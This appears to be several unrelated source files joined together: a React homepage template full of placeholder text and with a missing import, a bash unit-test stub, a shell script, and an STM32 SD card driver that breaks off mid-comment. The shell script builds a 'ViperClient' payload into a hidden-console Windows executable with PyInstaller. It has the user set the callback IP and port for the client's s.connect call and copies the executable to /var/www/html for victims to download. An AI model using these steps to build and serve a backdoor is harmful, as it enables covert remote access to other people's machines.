import Img5 from "../images/others/img-9.jpg"
import Img4 from "../images/others/img-9.jpg"
import Img2 from "../images/others/img-2.jpg"
import Portfolio1 from "../images/portfolio/port1.jpg"
import Portfolio2 from "../images/portfolio/port2.jpg"
import Portfolio3 from "../images/portfolio/port3.jpg"
import Portfolio4 from "../images/portfolio/port4.jpg"
import Portfolio5 from "../images/portfolio/port5.jpg"
import Portfolio6 from "../images/portfolio/port6.jpg"
import TeamImg3 from "../images/team/3.png"
import TeamImg6 from "../images/team/6.png"
import TeamImg5 from "../images/team/5.png"
import NewsImg1 from "../images/latest-blog/latest-blog-1.jpg"
import NewsImg2 from "../images/latest-blog/latest-blog-2.jpg"
import NewsImg3 from "../images/latest-blog/latest-blog-3.jpg"
import {
FaDropbox,
FaGlobeAsia,
FaPlaneDeparture,
FaTruckMoving,
FaRegHandLizard,
FaUserSecret,
} from "react-icons/fa"
import HeaderStyle1 from "../components/Header/HeaderStyle1"
import BootstrapSlider from "../components/Slideshow/BootstrapSlider"
import CallToAction2 from "../components/CallToAction/CallToAction2"
import FeatureStyle6 from "../components/Features/FeatureStyle6"
import SectionTitle from "../components/SectionTitle/SectionTitle"
import FeatureStyle7 from "../components/Features/FeatureStyle7"
import TeamStyle4 from "../components/Team/TeamStyle4"
import Clients from "../components/Clients"
import FooterStyle1 from "../components/Footer/FooterStyle1"
import Testimonial from "../components/Testimonial"
const Homepage4 = () => {
return (
<>
<HeaderStyle1 />
<BootstrapSlider />
<CallToAction2 bgColor="#ed1c24" btnSTyle="black" paddingClass="pad50" />
{/* Start Welcome Section */}
<section className="pad-t80 pad-b50">
<div className="container">
<div className="row">
<div className="col-md-4">
<FeatureStyle6
image={Img9}
title="Praesent sapien massa"
text="Donec sollicitudin molestie malesua. Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Donec sollicitudin molestie malesuada."
/>
</div>
<div className="col-md-4">
<FeatureStyle6
image={Img5}
title="Convallis pellentes nec"
text="Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Donec rutrum congue malesuada. Vestibulum ac diam sit amet quam vehicula elementum sed sit amet dui."
/>
</div>
<div className="col-md-4">
<FeatureStyle6
image={Img4}
title="Donec sollicitudin molestie"
text="Donec sollicitudin molestie malesua. Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Donec sollicitudin molestie malesuada."
/>
</div>
</div>
</div>
</section>
{/* End Welcome Section */}
{/* Start About Us Section */}
<section className="pad80" style={{ backgroundColor: "#f3f3f3" }}>
<div className="container">
<div className="row">
<div className="col-md-7">
<SectionTitle
titleStyle="left"
title="ABOUT US AND OUR PRIORITIES"
/>
<p>
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do
eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut
enim ad minim veniam, quis nostrud exercitation ullamco laboris
nisi ut aliquip ex ea commodo consequat.
</p>
<div className="row mbl-margin-bottom">
<div className="col-md-6">
<FeatureStyle7
icon={<FaDropbox />}
title="Packaging"
subtitle="We package & store"
/>
</div>
<div className="col-md-6">
<FeatureStyle7
icon={<FaGlobeAsia />}
title="Worldwide"
subtitle="Everywhere"
/>
</div>
<div className="col-md-6">
<FeatureStyle7
icon={<FaPlaneDeparture />}
title="Plane"
subtitle="Faster With Plane"
/>
</div>
<div className="col-md-6">
<FeatureStyle7
icon={<FaTruckMoving />}
title="Transporting"
subtitle="We Fast Transport"
/>
</div>
<div className="col-md-6">
<FeatureStyle7
icon={<FaRegHandLizard />}
title="Hand to Hand"
subtitle="Secure Transport"
/>
</div>
<div className="col-md-6">
<FeatureStyle7
icon={<FaUserSecret />}
title="Secure"
subtitle="We Gurantee"
/>
</div>
</div>
</div>
<div className="col-md-5">
<img src={Img2} alt="" className="w-100" />
<h4
style={{
marginTop: "30px",
marginBottom: "15px",
fontSize: "18px",
}}
>
Who We Are
</h4>
<p>
Proin eget tortor risus. Donec sollicitudin molestie malesuada.
Quisque velit nisi, pretium ut lacinia in, elementum id enim.
Quisque velit nisi, pretium ut lacinia in, elementum id enim.
Vestibulum ante ipsum primis in faucibus orci luctus et ultrices
posuere cubilia Curae.
</p>
</div>
</div>
</div>
</section>
{/* End About Us Section */}
{/* Start Portfolio Section */}
<section className="pad-t80 pad-b50">
<div className="container">
<div className="row">
<div className="col-md-12">
<SectionTitle title="Our Gallery" />
</div>
</div>
<div className="row portfolio-box">
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
<img src={Portfolio1} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
<img src={Portfolio2} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
<img src={Portfolio3} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
<img src={Portfolio4} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
<img src={Portfolio5} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
<img src={Portfolio6} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
{/* End Portfolio Section */}
{/* Start Team Member Section */}
<section
className="pad-t80 pad-b50"
style={{ backgroundColor: "#f3f3f3" }}
>
<div className="container">
<div className="row">
<div className="col-md-12">
<SectionTitle title="Who work for you" />
</div>
</div>
<div className="row">
<div className="col-md-4">
<TeamStyle4
teamImg={TeamImg3}
name="<NAME>"
designation="CEO & Founder"
details="Donec sollicitudin molestie malesua. Praesent sapien massa, convallis a pellentesque nec, egestas non nisi."
/>
</div>
<div className="col-md-4">
<TeamStyle4
teamImg={TeamImg6}
name="<NAME>"
designation="Consultant"
details="Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Donec rutrum congue malesuada. Vestibulum ac diam sit amet quam."
/>
</div>
<div className="col-md-4">
<TeamStyle4
teamImg={TeamImg5}
name="<NAME>"
designation="Manager"
details="Donec sollicitudin molestie malesua. Praesent sapien massa, convallis a pellentesque nec, egestas non nisi."
/>
</div>
</div>
</div>
</section>
{/* End Team Member Section */}
{/* Start Testimonial Section*/}
<section
className="pad80 parallax"
>
<div className="container">
<div className="row">
<div className="col-md-12">
<SectionTitle title="What people say" />
</div>
</div>
<div className="row">
<div className="col-md-12">
<Testimonial/>
</div>
</div>
</div>
</section>
{/* End Testimonial Section*/}
{/* Start Latest News Section*/}
<section
className="pad-t80 pad-b50"
style={{ backgroundColor: "#f9f9f9" }}
>
<div className="container">
<div className="row">
<div className="col-md-12">
<SectionTitle title="Latest News" />
</div>
</div>
<div className="row">
<div className="col-md-4">
<div className="latest-news">
<div className="latest-news-img">
<img src={NewsImg1} alt="blog-post" />
<div>
<span>Aug</span>
<span>06</span>
</div>
</div>
<h4>
<a href="#">
Lorem Ipsum is dummy text of type setting industry.
</a>
</h4>
<p>
Vivamus magna justo, lacinia eget consectetur convallis at
tellus. Lorem ipsum dolor sit consectetur adipiscing elit
</p>
</div>
</div>
<div className="col-md-4">
<div className="latest-news">
<div className="latest-news-img">
<img src={NewsImg3} alt="blog-post" />
<div>
<span>Aug</span>
<span>07</span>
</div>
</div>
<h4>
<a href="#">
Lorem Ipsum is dummy text of type setting industry.
</a>
</h4>
<p>
Vivamus magna justo, lacinia eget consectetur convallis at
tellus. Lorem ipsum dolor sit consectetur adipiscing elit
</p>
</div>
</div>
<div className="col-md-4">
<div className="latest-news">
<div className="latest-news-img">
<img src={NewsImg2} alt="blog-post" />
<div>
<span>Aug</span>
<span>08</span>
</div>
</div>
<h4>
<a href="#">
Lorem Ipsum is dummy text of type setting industry.
</a>
</h4>
<p>
Vivamus magna justo, lacinia eget consectetur convallis at
tellus. Lorem ipsum dolor sit consectetur adipiscing elit
</p>
</div>
</div>
</div>
</div>
</section>
{/* End Latest News Section*/}
{/* Start Client Section*/}
<section className="client-section pad80">
<div className="container">
<div className="row">
<div className="col-md-12">
<SectionTitle title="Our Client's" />
</div>
</div>
<div className="row">
<div className="col-md-12">
<Clients />
</div>
</div>
</div>
</section>
{/* End Client Section*/}
{/* Start Footer Section*/}
<FooterStyle1 />
{/* End Footer Section*/}
</>
)
}
export default Homepage4
|
#!/bin/bash
#/*
# * This file is part of TangoMan Bash Aliases package.
# *
# * Copyright (c) 2021 "Matthias Morin" <mat@tangoman.io>
# *
# * This source file is subject to the MIT license that is bundled
# * with this source code in the file LICENSE.
# */
# https://github.com/pgrange/bash_unit
#
# assert "test -e /tmp/the_file"
# assert_fails "grep this /tmp/the_file" "should not write 'this' in /tmp/the_file"
# assert_status_code 25 code # 127: command not found; 126: command not executable
# assert_equals "a string" "another string" "a string should be another string"
# assert_not_equals "a string" "a string" "a string should be different from another string"
# fake ps echo hello world
src_file="../../src/multimedia/picture-list-exif.sh"
# shellcheck source=/dev/null
. "${src_file}"
test_script_execution_should_return_expected_status_code() {
assert_status_code 0 "${src_file}"
}
|
#to Convert ViperClient.py to exe run commands below
echo "Generating ViperClient.exe"
echo ""
echo "read this first"
echo ""
echo "***Important please read before running this script. The payload will not work unless
you change the following line. make sure that you navigate to payloads/ViperClient.py and change
the IPADDESS and PORT number that you want client to call back to. if you have already changed
the ip addess and port number inside ViperClient.py press any key to continue"
echo ""
echo "Important first change this line to your own correct settings
s.connect(('0.0.0.0', 8081)), inside payloads/ViperClient.py"
echo ""
echo ""
echo "Once that line is changed then press any key to continue"
echo ""
echo ""
read -n 1 -s -p "Press any key to continue"
echo "generating ViperClient.exe"
# wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py
cd payloads/
wine pyinstaller --onefile --noconsole --nowindowed ViperClient.py
rm -rf build/
rm -rf dist/
sed -i 's/console=True/console=False/g' ViperClient.spec
wine pyinstaller ViperClient.spec
cp dist/ViperClient.exe .
cp dist/ViperClient.exe /var/www/html/
rm -rf build/
rm -rf dist/
cd ../ |
/**
******************************************************************************
* @file stm32h747i_discovery_sd.c
* @author MCD Application Team
* @brief This file includes the uSD card driver mounted on STM32H747I_DISCO
* boards.
@verbatim
How To use this driver:
-----------------------
- This driver is used to drive the micro SD external cards mounted on STM32H747I_DISCO
board.
- This driver does not need a specific component driver for the micro SD device
to be included with.
Driver description:
------------------
+ Initialization steps:
o Initialize the micro SD card using the BSP_SD_Init() function. This
function includes the MSP layer hardware resources initialization and the
SDIO interface configuration to interface with the external micro SD. It
also includes the micro SD initialization sequence.
o To check the SD card presence you can use the function BSP_SD_IsDetected() which
returns the detection status.
o If SD presence detection interrupt mode is desired, you must configure the
SD detection interrupt mode by calling the function BSP_SD_DetectITConfig().
The interrupt is generated as an external interrupt whenever the micro SD card is
plugged/unplugged in/from the evaluation board.
The SD detection is managed by MFX, so the SD detection interrupt has to be
treated by MFX_IRQOUT gpio pin IRQ handler. BSP_SD_DetectCallback() is called when
SD is detected.
o The function BSP_SD_GetCardInfo()are used to get the micro SD card information
which is stored in the structure "HAL_SD_CardInfoTypedef".
+ Micro SD card operations
o The micro SD card can be accessed with read/write block(s) operations once
it is ready for access. The access can be performed whether
using the polling mode by calling the functions BSP_SD_ReadBlocks()/BSP_SD_WriteBlocks(),
using the interrupt mode by calling the functions BSP_SD_ReadBlocks_IT()/BSP_SD_WriteBlocks_IT(),
or by DMA transfer using the functions BSP_SD_ReadBlocks_DMA()/BSP_SD_WriteBlocks_DMA().
o The DMA transfer complete is used with interrupt mode. Once the SD transfer
is complete, the SD interrupt is handled using the function BSP_SDMMC1_IRQHandler()
The DMA Tx/Rx transfer complete are handled using the functions
SD_SDMMC1_DMA_Tx_IRQHandler(), SD_SDMMC1_DMA_Rx_IRQHandler().The corresponding
user callbacks are implemented by the user at application level.
o The SD erase block(s) is performed using the functions BSP_SD_Erase() with specifying
the number of blocks to erase.
o The SD runtime status is returned when calling the function BSP_SD_GetCardState().
@endverbatim
******************************************************************************
* @attention
*
* <h2><center>© Copyright (c) 2018 STMicroelectronics.
* All rights reserved.</center></h2>
*
* This software component is licensed by ST under BSD 3-Clause license,
* the "License"; You may not use this file except in compliance with the
* License. You may obtain a copy of the License at:
* opensource.org/licenses/BSD-3-Clause
*
******************************************************************************
*/
/* Includes ------------------------------------------------------------------*/
#include "stm32h747i_discovery_sd.h"
#include "stm32h747i_discovery_bus.h"
/** @addtogroup BSP
* @{
*/
/** @addtogroup STM32H747I_DISCO
* @{
*/
/** @defgroup STM32H747I_DISCO_SD SD
* @{
*/
/** @defgroup STM32H747I_DISCO_SD_Private_TypesDefinitions Private TypesDefinitions
* @{
*/
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
/* Is Msp Callbacks registered */
static uint32_t IsMspCallbacksValid[SD_INSTANCES_NBR] = {0};
#endif
typedef void (* BSP_EXTI_LineCallback) (void);
/**
* @}
*/
/** @defgroup STM32H747I_DISCO_SD_Exported_Variables Exported Variables
* @{
*/
SD_HandleTypeDef hsd_sdmmc[SD_INSTANCES_NBR];
EXTI_HandleTypeDef hsd_exti[SD_INSTANCES_NBR];
/**
* @}
*/
/** @defgroup STM32H747I_DISCO_SD_Private_Variables Private Variables
* @{
*/
static uint32_t PinDetect[SD_INSTANCES_NBR] = {SD_DETECT_PIN};
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
/* Is Msp Callbacks registered */
static uint32_t IsMspCallbacksValid[SD_INSTANCES_NBR] = {0};
#endif
/**
* @}
*/
/** @defgroup STM32H747I_DISCO_SD_Private_Functions_Prototypes Private Functions Prototypes
* @{
*/
static void SD_MspInit(SD_HandleTypeDef *hsd);
static void SD_MspDeInit(SD_HandleTypeDef *hsd);
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
static void SD_AbortCallback(SD_HandleTypeDef *hsd);
static void SD_TxCpltCallback(SD_HandleTypeDef *hsd);
static void SD_RxCpltCallback(SD_HandleTypeDef *hsd);
#if (USE_SD_TRANSCEIVER > 0U)
static void SD_DriveTransceiver_1_8V_Callback(FlagStatus status);
#endif
#endif /* (USE_HAL_SD_REGISTER_CALLBACKS == 1) */
static void SD_EXTI_Callback(void);
/**
* @}
*/
/** @defgroup STM32H747I_DISCO_SD_Exported_Functions Exported Functions
* @{
*/
/**
* @brief Initializes the SD card device.
* @param Instance SD Instance
* @retval BSP status
*/
int32_t BSP_SD_Init(uint32_t Instance)
{
int32_t ret = BSP_ERROR_NONE;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
if(BSP_SD_IsDetected(Instance) != SD_PRESENT)
{
ret = BSP_ERROR_UNKNOWN_COMPONENT;
}
else
{
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
/* Register the SD MSP Callbacks */
if(IsMspCallbacksValid[Instance] == 0UL)
{
if(BSP_SD_RegisterDefaultMspCallbacks(Instance) != BSP_ERROR_NONE)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
}
#else
/* Msp SD initialization */
SD_MspInit(&hsd_sdmmc[Instance]);
#endif /* USE_HAL_SD_REGISTER_CALLBACKS */
if(ret == BSP_ERROR_NONE)
{
/* HAL SD initialization and Enable wide operation */
if(MX_SDMMC1_SD_Init(&hsd_sdmmc[Instance]) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
#if (USE_SD_BUS_WIDE_4B > 0)
else if(HAL_SD_ConfigWideBusOperation(&hsd_sdmmc[Instance], SDMMC_BUS_WIDE_4B) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
#endif
else
{
/* Switch to High Speed mode if the card support this mode */
(void)HAL_SD_ConfigSpeedBusOperation(&hsd_sdmmc[Instance], SDMMC_SPEED_MODE_HIGH);
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
/* Register SD TC, HT and Abort callbacks */
if(HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_TX_CPLT_CB_ID, SD_TxCpltCallback) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
else if(HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_RX_CPLT_CB_ID, SD_RxCpltCallback) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
else if(HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_ABORT_CB_ID, SD_AbortCallback) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
else
{
#if (USE_SD_TRANSCEIVER != 0U)
if(HAL_SD_RegisterTransceiverCallback(&hsd_sdmmc[Instance], SD_DriveTransceiver_1_8V_Callback) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
#endif
}
#endif /* USE_HAL_SD_REGISTER_CALLBACKS */
}
}
}
}
return ret;
}
/**
* @brief DeInitializes the SD card device.
* @param Instance SD Instance
* @retval SD status
*/
int32_t BSP_SD_DeInit(uint32_t Instance)
{
int32_t ret = BSP_ERROR_NONE;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
if(HAL_SD_DeInit(&hsd_sdmmc[Instance]) != HAL_OK)/* HAL SD de-initialization */
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
else
{
/* Msp SD de-initialization */
#if (USE_HAL_SD_REGISTER_CALLBACKS == 0)
SD_MspDeInit(&hsd_sdmmc[Instance]);
#endif /* (USE_HAL_SD_REGISTER_CALLBACKS == 0) */
}
}
return ret;
}
/**
* @brief Initializes the SDMMC1 peripheral.
* @param hsd SD handle
* @retval HAL status
*/
__weak HAL_StatusTypeDef MX_SDMMC1_SD_Init(SD_HandleTypeDef *hsd)
{
HAL_StatusTypeDef ret = HAL_OK;
/* uSD device interface configuration */
hsd->Instance = SDMMC1;
hsd->Init.ClockEdge = SDMMC_CLOCK_EDGE_RISING;
hsd->Init.ClockPowerSave = SDMMC_CLOCK_POWER_SAVE_DISABLE;
#if (USE_SD_BUS_WIDE_4B > 0)
hsd->Init.BusWide = SDMMC_BUS_WIDE_4B;
#else
hsd->Init.BusWide = SDMMC_BUS_WIDE_1B;
#endif
hsd->Init.HardwareFlowControl = SDMMC_HARDWARE_FLOW_CONTROL_DISABLE;
#if (USE_SD_TRANSCEIVER >0)
hsd->Init.TranceiverPresent = SDMMC_TRANSCEIVER_PRESENT;
#endif /*USE_SD_TRANSCEIVER*/
#if ( USE_SD_HIGH_PERFORMANCE > 0 )
hsd->Init.ClockDiv = SDMMC_HSpeed_CLK_DIV;
#else
hsd->Init.ClockDiv = SDMMC_NSpeed_CLK_DIV;
#endif /*USE_SD_HIGH_PERFORMANCE*/
/* HAL SD initialization */
if(HAL_SD_Init(hsd) != HAL_OK)
{
ret = HAL_ERROR;
}
return ret;
}
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
/**
* @brief Default BSP SD Msp Callbacks
* @param Instance SD Instance
* @retval BSP status
*/
int32_t BSP_SD_RegisterDefaultMspCallbacks(uint32_t Instance)
{
int32_t ret = BSP_ERROR_NONE;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
/* Register MspInit/MspDeInit Callbacks */
if(HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_MSP_INIT_CB_ID, SD_MspInit) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
else if(HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_MSP_DEINIT_CB_ID, SD_MspDeInit) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
else
{
IsMspCallbacksValid[Instance] = 1U;
}
}
/* Return BSP status */
return ret;
}
/**
* @brief BSP SD Msp Callback registering
* @param Instance SD Instance
* @param CallBacks pointer to MspInit/MspDeInit callbacks functions
* @retval BSP status
*/
int32_t BSP_SD_RegisterMspCallbacks(uint32_t Instance, BSP_SD_Cb_t *CallBacks)
{
int32_t ret = BSP_ERROR_NONE;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
/* Register MspInit/MspDeInit Callbacks */
if(HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_MSP_INIT_CB_ID, CallBacks->pMspInitCb) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
else if(HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_MSP_DEINIT_CB_ID, CallBacks->pMspDeInitCb) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
else
{
IsMspCallbacksValid[Instance] = 1U;
}
}
/* Return BSP status */
return ret;
}
#endif /* (USE_HAL_SD_REGISTER_CALLBACKS == 1) */
/**
* @brief Configures Interrupt mode for SD detection pin.
* @param Instance SD Instance
* @retval BSP status
*/
int32_t BSP_SD_DetectITConfig(uint32_t Instance)
{
int32_t ret;
GPIO_InitTypeDef gpio_init_structure;
const uint32_t SD_EXTI_LINE[SD_INSTANCES_NBR] = {SD_DETECT_EXTI_LINE};
static BSP_EXTI_LineCallback SdCallback[SD_INSTANCES_NBR] = {SD_EXTI_Callback};
if(Instance> SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
gpio_init_structure.Pin = PinDetect[Instance];
gpio_init_structure.Pull = GPIO_PULLUP;
gpio_init_structure.Speed = GPIO_SPEED_FREQ_HIGH;
gpio_init_structure.Mode = GPIO_MODE_IT_RISING_FALLING;
HAL_GPIO_Init(SD_DETECT_GPIO_PORT, &gpio_init_structure);
/* Enable and set SD detect EXTI Interrupt to the lowest priority */
HAL_NVIC_SetPriority((IRQn_Type)(SD_DETECT_EXTI_IRQn), 0x0F, 0x00);
HAL_NVIC_EnableIRQ((IRQn_Type)(SD_DETECT_EXTI_IRQn));
HAL_EXTI_GetHandle(&hsd_exti[Instance], SD_EXTI_LINE[Instance]);
if(HAL_EXTI_RegisterCallback(&hsd_exti[Instance], HAL_EXTI_COMMON_CB_ID, SdCallback[Instance]) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
else
{
ret = BSP_ERROR_NONE;
}
}
/* Return BSP status */
return ret;
}
/**
* @brief BSP SD Callback.
* @param Instance SD Instance
* @param Status Pin status
* @retval None.
*/
__weak void BSP_SD_DetectCallback(uint32_t Instance, uint32_t Status)
{
/* Prevent unused argument(s) compilation warning */
UNUSED(Instance);
UNUSED(Status);
/* This function should be implemented by the user application.
It is called into this driver when an event on JoyPin is triggered. */
}
/**
* @brief Detects if SD card is correctly plugged in the memory slot or not.
* @param Instance SD Instance
* @retval Returns if SD is detected or not
*/
int32_t BSP_SD_IsDetected(uint32_t Instance)
{
int32_t ret = BSP_ERROR_UNKNOWN_FAILURE;
if(Instance >= SD_INSTANCES_NBR)
{
return BSP_ERROR_WRONG_PARAM;
}
else
{
ret = (uint32_t)HAL_GPIO_ReadPin(SD_DETECT_GPIO_PORT,GPIO_PIN_8 );/*PinDetect[Instance]*/
/* Check SD card detect pin */
if(ret != GPIO_PIN_RESET)
{
ret = (int32_t)SD_NOT_PRESENT;
}
else
{
ret = (int32_t)SD_PRESENT;
}
}
return ret;
}
/**
* @brief Reads block(s) from a specified address in an SD card, in polling mode.
* @param Instance SD Instance
* @param pData Pointer to the buffer that will contain the data to transmit
* @param BlockIdx Block index from where data is to be read
* @param BlocksNbr Number of SD blocks to read
* @retval BSP status
*/
int32_t BSP_SD_ReadBlocks(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
int32_t ret = BSP_ERROR_NONE;
uint32_t timeout = SD_READ_TIMEOUT*BlocksNbr;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
if(HAL_SD_ReadBlocks(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr, timeout) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
}
/* Return BSP status */
return ret;
}
/**
* @brief Writes block(s) to a specified address in an SD card, in polling mode.
* @param Instance SD Instance
* @param pData Pointer to the buffer that will contain the data to transmit
* @param BlockIdx Block index from where data is to be written
* @param BlocksNbr Number of SD blocks to write
* @retval BSP status
*/
int32_t BSP_SD_WriteBlocks(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
int32_t ret = BSP_ERROR_NONE;
uint32_t timeout = SD_READ_TIMEOUT*BlocksNbr;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
if(HAL_SD_WriteBlocks(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr, timeout) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
}
/* Return BSP status */
return ret;
}
/**
* @brief Reads block(s) from a specified address in an SD card, in DMA mode.
* @param Instance SD Instance
* @param pData Pointer to the buffer that will contain the data to transmit
* @param BlockIdx Block index from where data is to be read
* @param BlocksNbr Number of SD blocks to read
* @retval BSP status
*/
int32_t BSP_SD_ReadBlocks_DMA(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
int32_t ret = BSP_ERROR_NONE;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
if(HAL_SD_ReadBlocks_DMA(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
}
/* Return BSP status */
return ret;
}
/**
* @brief Writes block(s) to a specified address in an SD card, in DMA mode.
* @param Instance SD Instance
* @param pData Pointer to the buffer that will contain the data to transmit
* @param BlockIdx Block index from where data is to be written
* @param BlocksNbr Number of SD blocks to write
* @retval BSP status
*/
int32_t BSP_SD_WriteBlocks_DMA(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
int32_t ret = BSP_ERROR_NONE;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
if(HAL_SD_WriteBlocks_DMA(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
}
/* Return BSP status */
return ret;
}
/**
* @brief Reads block(s) from a specified address in an SD card, in DMA mode.
* @param Instance SD Instance
* @param pData Pointer to the buffer that will contain the data to transmit
* @param BlockIdx Block index from where data is to be read
* @param BlocksNbr Number of SD blocks to read
* @retval SD status
*/
int32_t BSP_SD_ReadBlocks_IT(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
int32_t ret = BSP_ERROR_NONE;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
if(HAL_SD_ReadBlocks_IT(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
}
/* Return BSP status */
return ret;
}
/**
* @brief Writes block(s) to a specified address in an SD card, in DMA mode.
* @param Instance SD Instance
* @param pData Pointer to the buffer that will contain the data to transmit
* @param BlockIdx Block index from where data is to be written
* @param BlocksNbr Number of SD blocks to write
* @retval SD status
*/
int32_t BSP_SD_WriteBlocks_IT(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
int32_t ret = BSP_ERROR_NONE;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
if(HAL_SD_WriteBlocks_IT(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
}
/* Return BSP status */
return ret;
}
/**
* @brief Erases the specified memory area of the given SD card.
* @param Instance SD Instance
* @param BlockIdx Block index from where data is to be
* @param BlocksNbr Number of SD blocks to erase
* @retval SD status
*/
int32_t BSP_SD_Erase(uint32_t Instance, uint32_t BlockIdx, uint32_t BlocksNbr)
{
int32_t ret = BSP_ERROR_NONE;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
if(HAL_SD_Erase(&hsd_sdmmc[Instance], BlockIdx, BlockIdx + BlocksNbr) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
}
/* Return BSP status */
return ret;
}
/**
* @brief Gets the current SD card data status.
* @param Instance SD Instance
* @retval Data transfer state.
* This value can be one of the following values:
* @arg SD_TRANSFER_OK: No data transfer is acting
* @arg SD_TRANSFER_BUSY: Data transfer is acting
*/
int32_t BSP_SD_GetCardState(uint32_t Instance)
{
return (int32_t)((HAL_SD_GetCardState(&hsd_sdmmc[Instance]) == HAL_SD_CARD_TRANSFER ) ? SD_TRANSFER_OK : SD_TRANSFER_BUSY);
}
/**
* @brief Get SD information about specific SD card.
* @param Instance SD Instance
* @param CardInfo Pointer to HAL_SD_CardInfoTypedef structure
* @retval BSP status
